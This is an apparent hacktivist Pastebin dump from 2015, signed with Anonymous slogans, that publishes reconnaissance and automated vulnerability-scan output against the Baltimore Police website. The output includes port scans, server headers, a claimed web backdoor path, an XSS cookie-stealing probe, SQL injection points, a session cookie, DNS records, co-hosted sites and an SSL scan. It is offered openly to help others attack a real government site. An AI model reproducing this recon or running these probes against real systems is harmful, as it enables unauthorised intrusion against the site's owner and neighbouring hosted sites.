"EXploitation/baltimorepolice.org" By Sneakyone12 (https://pastebin.com/u/Sneakyone12) URL: https://pastebin.com/am4Jc4nJ Created on: Wednesday 29th of April 2015 01:45:47 PM CDT Retrieved on: Saturday 31 of October 2020 06:10:30 AM UTC We are Anonymous We are Legion We do not ForGive We do not ForGet Expect us.. Rise of The Hacktivist.... Pentest of baltimorepolice.org @ 78% >>> Enjoy :)) #Lulz http://www.baltimorepolice.org/ ----------------------------- Server Type: nginx - IP Address: 23.253.170.199 scan report for www.baltimorepolice.org (23.253.170.199) Host is up (0.071s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https -------------------------/ Name Servers ============/ ns87.worldnic.com: 207.204.40.144 - scan report for 207.204.40.144 Host is up (0.035s latency). PORT STATE SERVICE 53/tcp open domain 80/tcp open http ---- ns88.worldnic.com: 207.204.21.144 - scan report for 207.204.21.144 Host is up (0.0078s latency). PORT STATE SERVICE 80/tcp open http -----------------------/ HTTP Headers for www.baltimorepolice.org =========================================/ HTTP/1.1 200 OK Cache-Control: public, max-age=86400 Content-Language: en Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Tue, 28 Apr 2015 19:05:12 GMT Server: nginx X-Drupal-Cache: HIT X-Generator: Drupal 7 (http://drupal.org) X-Pantheon-Endpoint: 36234664-8913-4aec-b6dd-0dd1f4642920 X-Pantheon-Styx-Hostname: styxf9257755 X-Powered-By: PHP/5.3.29 X-Styx-Build-Date: Tue Apr 28 03:42:27 UTC 2015 X-Styx-Build-Num: 942 X-Styx-Build-Sha: fd514102420d3e89eba15e69540af0a692649330 X-Styx-Req-Id: styx-f920cfb93db3f8f058d581ab467bdf8b X-Styx-Version: StyxGo Date: Wed, 29 Apr 2015 15:55:41 GMT X-Varnish: 2782104623 2761980092 Age: 74982 Via: 1.1 varnish Connection: close Vary: Accept-Encoding, Cookie, Cookie X-Pre-Strip-Debug: Location: ==============================================================/ 
http://www.baltimorepolice.org/robots.txt
----------------------------------------/
#
# robots.txt
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
====================================================================/
EXPLOITS: to www.baltimorepolice.org.
=====================================/
A web backdoor was found at: "http://www.baltimorepolice.org/user/locus.php"; this could indicate that the server was hacked.
GET http://www.baltimorepolice.org/user/locus.php HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/CHANGELOG.txt".
Vulnerability description: "A changelog was found.
GET http://www.baltimorepolice.org/CHANGELOG.txt HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/INSTALL.mysql.txt".
Vulnerability description: "Drupal installation file found."
GET http://www.baltimorepolice.org/INSTALL.mysql.txt HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/INSTALL.pgsql.txt".
Vulnerability description: "Drupal installation file found." GET http://www.baltimorepolice.org/INSTALL.pgsql.txt HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/xmlrpc.php". Vulnerability description: "xmlrpc.php was found. GET http://www.baltimorepolice.org/xmlrpc.php HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/LICENSE.txt". Vulnerability description: "License file found may identify site software." GET http://www.baltimorepolice.org/LICENSE.txt HTTP/1.1 Host: www.baltimorepolice.org Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/install.php". Vulnerability description: "Drupal install.php file found.". GET http://www.baltimorepolice.org/install.php HTTP/1.1 Host: www.baltimorepolice.org Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/UPGRADE.txt". Vulnerability description: "Default file found.". GET http://www.baltimorepolice.org/UPGRADE.txt HTTP/1.1 Host: www.baltimorepolice.org Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/INSTALL.txt". Vulnerability description: "Default file found." GET http://www.baltimorepolice.org/INSTALL.txt HTTP/1.1 Host: www.baltimorepolice.org Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?topic=<script>alert(document.cookie)</script>%20". Vulnerability description: GET http://www.baltimorepolice.org/index.php? HTTP/1.1 Host: www.baltimorepolice.org ----/ found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?SqlQuery=test%20". 
Vulnerability description:
GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?pymembs=admin".
Vulnerability description:
GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?IDAdmin=test".
Vulnerability description:
GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?base=test%20".
Vulnerability description:
GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/user/".
Vulnerability description: "This might be interesting.
GET http://www.baltimorepolice.org/user/ HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/sitemap.xml".
Vulnerability description: "This gives a nice listing of the site content."
GET http://www.baltimorepolice.org/sitemap.xml HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?module=My_eGallery".
Vulnerability description: "My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection."
GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/web.config".
Vulnerability description: "ASP config file found.".
GET http://www.baltimorepolice.org/web.config HTTP/1.1
Host: www.baltimorepolice.org
----/
"X-Powered-By" header for this HTTP server is: "PHP/5.3.29"
--/
The URL "http://www.baltimorepolice.org/" has the following allowed methods: *, GET, HEAD, POST.
--/
The server header for the remote web server is: "nginx"
--/
The target site *has* a DNS wildcard configuration
--
The contents of http://23.253.170.199 differ from the contents of http://www.baltimorepolice.org
--/
The remote web server seems to have a reverse proxy installed.
--/
[Manual verification required] The response body for a request with a trailing dot in the domain, and the response body without a trailing dot in the domain differ. This could indicate a misconfiguration in the virtual host settings. In some cases, this misconfiguration permits the attacker to read the source code of the web application
GET http://www.baltimorepolice.org HTTP/1.1
Host: www.baltimorepolice.org
----/
[Manual verification required] The response body for a request with a trailing dot in the domain, and the response body without a trailing dot in the domain differ. This could indicate a misconfiguration in the virtual host settings. In some cases, this misconfiguration permits the attacker to read the source code of the web application
GET http://www.baltimorepolice.org/install.php HTTP/1.1
Host: www.baltimorepolice.org
----/
Found 2 URLs and 11 different points of injection.
SQL
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="en-US", language="en-US")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="en-US", language="ru")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="en-US", language="zh-TW")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="ru", language="en-US")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="ru", language="ru")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="ru", language="zh-TW")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="zh-TW", language="en-US")
--
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="zh-TW", language="ru")
--
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="zh-TW", language="zh-TW")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-XQlBj...", form_id="search_blo...")
=====================================================================/
[*] CNAME www.baltimorepolice.org live-baltopd.pantheon.io
[*] CNAME live-baltopd.pantheon.io styx-01.pantheon.io
[*] A styx-01.pantheon.io 23.253.170.199
[*] A styx-01.pantheon.io 192.237.244.66
[*] A styx-01.pantheon.io 23.253.58.7
[*] CNAME www.baltimorepolice.org live-baltopd.pantheon.io
[*] CNAME live-baltopd.pantheon.io styx-01.pantheon.io
[*] AAAA styx-01.pantheon.io 2001:4801:7825:101:be76:4eff:fe11:8f4f
[*] AAAA styx-01.pantheon.io 2001:4801:7822:101:be76:4eff:fe10:959b
[*] AAAA styx-01.pantheon.io 2001:4801:7824:102:be76:4eff:fe10:8f3a
======================================================================/
----- www.baltimorepolice.org -----
Host's addresses:
__________________
styx-01.pantheon.io 5 IN A 23.253.170.199
styx-01.pantheon.io 5 IN A 192.237.244.66
styx-01.pantheon.io 5 IN A 23.253.58.7
========================================================================/
23.253.170.199
17 site(s) hosted on ip 23.253.170.199
Location: San Antonio,United States
eaglecreek.com baltimorepolice.org perc.org the200acres.com goldmanprize.org servicesource.com newstatesman.com equalityontrial.com homeperformance.org hobostrom.com colt.net bpihomeowner.org insideclimatenews.org iescustomstaffing.com cdobs.com what-is-fracking.com revealnews.org
=================================================================/
Testing SSL server 23.253.170.199 on port 443
---------------------------------------------
Accepted TLSv1 256 bits AES256-SHA -
Accepted TLSv1 128 bits AES128-SHA -
Accepted TLSv1 168 bits DES-CBC3-SHA -
Prefered Server Cipher(s):
TLSv1 128 bits AES128-SHA
SSL Certificate:
Version: 2
Serial Number: -4294967295
Signature Algorithm: sha256WithRSAEncryption
Issuer: /C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA
Not valid before: Sep 18 00:00:00 2014 GMT
Not valid after: Nov 25 12:00:00 2015 GMT
Subject: /C=US/ST=California/L=San Francisco/O=Pantheon Systems, Inc./CN=*.pantheon.io
Public Key Algorithm: rsaEncryption
RSA Public Key: (2048 bit)
Modulus (2048 bit):
Exponent: 65537 (0x10001)
X509v3 Extensions:
X509v3 Authority Key Identifier: keyid:0F:80:61:1C:82:31:61:D5:2F:28:E7:8D:46:38:B4:2C:E1:C6:D9:E2
X509v3 Subject Key Identifier: 53:89:42:63:7A:53:86:B9:25:90:BA:DE:C6:77:0A:E6:4F:70:DF:8E
X509v3 Subject Alternative Name: DNS:*.pantheon.io, DNS:pantheon.io, DNS:*.gotpantheon.com, DNS:gotpantheon.com, DNS:*.getpantheon.com, DNS:getpantheon.com
X509v3 Key Usage: critical Digital Signature, Key Encipherment
X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points: URI:http://crl3.digicert.com/ssca-sha2-g3.crl URI:http://crl4.digicert.com/ssca-sha2-g3.crl
X509v3 Certificate Policies: Policy: 2.16.840.1.114412.1.1 CPS: https://www.digicert.com/CPS
Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt
X509v3 Basic Constraints: critical CA:FALSE
=============================================================================================//